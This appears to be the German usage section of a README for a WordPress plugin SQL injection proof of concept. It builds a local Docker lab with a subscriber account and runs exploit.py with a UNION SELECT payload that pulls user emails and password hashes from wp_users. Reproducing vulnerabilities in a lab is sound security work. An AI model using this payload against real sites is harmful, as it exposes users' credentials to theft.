Verwendung
- Starten Sie mysql, wordpress und wordpress-cli mit docker-compose
docker-compose -f docker-compose.yaml up -d
- Installieren Sie wordpress, aktivieren Sie das Plugin und erstellen Sie einen Benutzer mit der Rolle subscriber über wordpress-cli
docker-compose run --rm wp-cli install-wp
- Starten Sie das Exploit-Skript mit einer SQL-Abfrage, die Benutzer-E-Mails und Passwörter abruft
python3 exploit.py -C 'union select 1,1,user_email,user_pass from wp_users -- '